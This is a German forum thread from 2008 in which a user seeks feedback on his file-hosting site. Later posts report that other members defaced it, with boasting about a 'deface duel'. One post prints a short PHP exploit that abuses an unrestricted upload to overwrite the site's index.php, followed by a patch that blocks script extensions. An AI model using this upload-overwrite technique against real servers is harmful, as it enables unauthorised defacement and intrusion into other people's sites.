[PHP] Meine Seite (EmpireShare)

Dieses Thema im Forum "Webentwicklung" wurde erstellt von Big_Ben, 26. Januar 2008 .

Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 26. Januar 2008
    Meine Seite (EmpireShare)

    Hi leute...wollt mal meine seite reinstellen und schaun was ihr darüber so denkt über des aussehen und so alles eig.

    Die seite ist noch im aufbau aber ich weis nicht was ich da noch so verbessern könnte,
    vll weis ja einer von euch ne verbesserung oder was is an der seite.

    http://www.empireshare.de

    ich zähl auf euch......
    mfg Big_Ben
     
  2. 26. Januar 2008
    AW: Meine Seite (EmpireShare)

    jo, die seite ist recht gut. der header gefällt mir!
    nur die linke sidebar, das bild. arggghhhhh ^^

    mach das schlechte bild raus, und ersetz es lieber durch formatierten Text!
    und beim content bereich würde ich die ganze breite ausnutzen! jedenfalls
    die breite die du mit dem header eh schon brauchst!

    ansonsten recht gut!
     
  3. 26. Januar 2008
    AW: Meine Seite (EmpireShare)

    des bild auf der seite kommt sowieso weg da kommt ein anderes und besseres her

    ich finde nur den passenden script nicht dafür um die ganze breite auszunutzen.....
     
  4. 26. Januar 2008
    AW: Meine Seite (EmpireShare)

    Das Script ist ja bekannt und nicht gerade das beste. Wenn man bei "Serverstandort" SFT-Host (USA) angibt wird man auf bbserver.ath.cx/..... weitergeleitet, diese Seite existiert jedoch nicht. Die Download-Links funktionieren auch nicht (wieder Seite nicht gefunden), liegt vielleicht an der Domain "ath.cx". Ansonsten ist das Design ganz ok, außer links der HSV-Computer Banner.
     
  5. 26. Januar 2008
    AW: Meine Seite (EmpireShare)

    ja wie gesagt die seite ist noch im aufbau... sft-host (usa) kommt auch hof ich mal heute abend online....

    die müssten eig schon laufen die download-links....

    edit: Download-Links gehen jetzt wieder
     
  6. 26. Januar 2008
    AW: Meine Seite (EmpireShare)

    Also bevor du überhaupt ernst genommen werden kannst, solltest du deine Sprache deutlich verbessern!!!

    - auch hof ich mal
    - ich finde nur den passenden script nicht dafür um die ganze breite auszunutze
    - Empire-Share, Beste 1-click file-hoster.
    - Server mit über 1024 Gigabytes hard- drive Kapazität!
    - Kein IP Loging.

    Also Patrick (der nächste Tip von mir), das reicht schon um deine Seite für ewig in meiner Liste zu verbannen und von deinen "Programmierskills" will ich dann gar nciht sprechen, da muss noch EXTREM viel gemacht werden!
     
  7. 26. Januar 2008
    AW: Meine Seite (EmpireShare)

    Ja, jetzt wo der "Direkt-Linking-Download" deaktiviert wurde, kann man die Dateien problemlos runterladen.

    Zudem solltest du dich auf eine Sprache einigen.
     
  8. 26. Januar 2008
    AW: Meine Seite (EmpireShare)

    ja ich muss auf der seite noch alles in richtiges deutsch übersetzen.
     
  9. 26. Januar 2008
    AW: Meine Seite (EmpireShare)

    Warning: Cannot modify header information - headers already sent by (output started at D:\server\htdocs\header.php:7) in D:\server\htdocs\download2.php on line 75

    Warning: Cannot modify header information - headers already sent by (output started at D:\server\htdocs\header.php:7) in D:\server\htdocs\download2.php on line 76

    Warning: Cannot modify header information - headers already sent by (output started at D:\server\htdocs\header.php:7) in D:\server\htdocs\download2.php on line 77
     
  10. 26. Januar 2008
    AW: Meine Seite (EmpireShare)

    wieder so ein server auf den ich ohne proxy ned drauf komm....

    design: 2/10
    html: 3/10 (schaut sehr nach dreamweaver aus)

    kein service den ich nutzen würde
     
  11. 2. März 2008
    AW: Meine Seite (EmpireShare)

    header is richtig nice...aba dann das weiße unten find ich irgendwie zu schlicht...obn denkt man wow...und dann schaut man runter und da is die pure enttäuschung
     
  12. 2. März 2008
    AW: Meine Seite (EmpireShare)

    defaced.

    wie steht ja da ^^
     
  13. 2. März 2008
    AW: Meine Seite (EmpireShare)

    och Murdoc... das musste doch net sein....
    Wollt mich grad mal ranmachn -.- aber nein....

    Du kleiner Assi
     
  14. 2. März 2008
    AW: Meine Seite (EmpireShare)

    rofl ihr pösen.
     
  15. 2. März 2008
    AW: Meine Seite (EmpireShare)

    LOL, auch nochmal ebend geowned

    Wenn dein Script sicher sein soll dann deaktiviere, dass man PHP Dateien ausführen kann...

    mFg Chrisomator

    //EDIT: @Murdoc: Deface Duell
     
  16. 2. März 2008
    AW: Meine Seite (EmpireShare)

    hier der exploit:

    Spoiler
    PHP:
    <? php ob_start ();  ?>

    // euer php-script -> ohne <?php und ?> (sonst klappts ned!)

    <?php file_put_contents ( '../index.php' '<?php'  ob_get_clean () .  '?>' );  ?>

    fix: hotlinking.php -> http://bbserver.ath.cx/hotlinking.php

    suche:
    PHP:
    <!-- Upload file if present  -->
    <?php
    if ( $_FILES [ 'userfile' ][ 'name' ]) {

        
    $fileName    $_FILES [ 'userfile' ][ 'name' ];
        
    $uploadPath  " $THIS_DIR /hotlink/ $fileName " ;
        if (
    move_uploaded_file ( $_FILES [ 'userfile' ][ 'tmp_name' ],  $uploadPath )) {
            print 
    "<p><b>Downloadlink:</b><textarea>http://bbserver.ath.cx/hotlink/ $fileName </textarea></p><br/>\n" ;
        } else {
            print 
    "<p>Es gab ein Problem beim Hochladen der Datei <b> $fileName </b>.</p><br/>\n" ;
        }
    }

    ?>
    ersetze mit:
    PHP:
    <!-- Upload file if present  -->
    <?php
    if ( $_FILES [ 'userfile' ][ 'name' ]) {

        
    $fileName    $_FILES [ 'userfile' ][ 'name' ];
        
        
    //php-patch
        
    $extension  explode ( '.' $fileName );
        switch(
    strToLower ( $extension [ count ( $extension )- 1 ])) {
            case 
    'php' :
            case 
    'php4' :
            case 
    'php5' :
            case 
    'phtml' :
            case 
    'htaccess' :
            case 
    'html' :
            case 
    'shtml' :
            
    //weitere hinzufügen mit case 'die_mag_i_net':
                
    exit( 'you ****!' );
        }
        
    //end php-patch
        
        
    $uploadPath  " $THIS_DIR /hotlink/ $fileName " ;
        if (
    move_uploaded_file ( $_FILES [ 'userfile' ][ 'tmp_name' ],  $uploadPath )) {
            print 
    "<p><b>Downloadlink:</b><textarea>http://bbserver.ath.cx/hotlink/ $fileName </textarea></p><br/>\n" ;
        } else {
            print 
    "<p>Es gab ein Problem beim Hochladen der Datei <b> $fileName </b>.</p><br/>\n" ;
        }
    }

    ?>
    oder mach ne .htaccess rein und schick .php's garned erst zum interpreter
     
  17. 4. März 2008
    AW: Meine Seite (EmpireShare)

    Es ist viel sicherer beim Hotlinking auf mod_rewrite und php-gateway zu setzen. So kann man Fehler und ungewollte Aufrufe viel besser abfangen.
     
  18. 4. März 2008
    AW: Meine Seite (EmpireShare)

    Was soll ich da bewerten, das ist doch das wbb-Standart-Theme... nur mit nem anderen Header drüber...
     
  19. 4. März 2008
    AW: Meine Seite (EmpireShare)

    Die seite gibts ja auch ned mehr ...

    Der Domain leitet ja nur auf einen anderen weiter.
    Was passiert ist steht doch oben .
     
  20. 4. März 2008
    AW: Meine Seite (EmpireShare)

    Achso hoppla mein Fehler Ja hab net mehr alles gelesen, hab mich nur gewundert wieso soviel Feedback kam auf Seite 1 =)
     
  21. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.